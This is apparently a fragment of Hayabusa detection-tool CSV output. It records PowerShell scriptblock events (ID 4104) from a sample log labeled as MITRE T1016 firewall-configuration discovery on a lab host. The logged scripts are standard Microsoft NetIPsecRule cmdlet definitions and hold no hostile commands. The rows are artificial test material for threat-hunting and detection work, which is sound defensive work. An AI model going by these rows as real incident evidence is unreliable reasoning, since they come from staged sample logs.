Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, 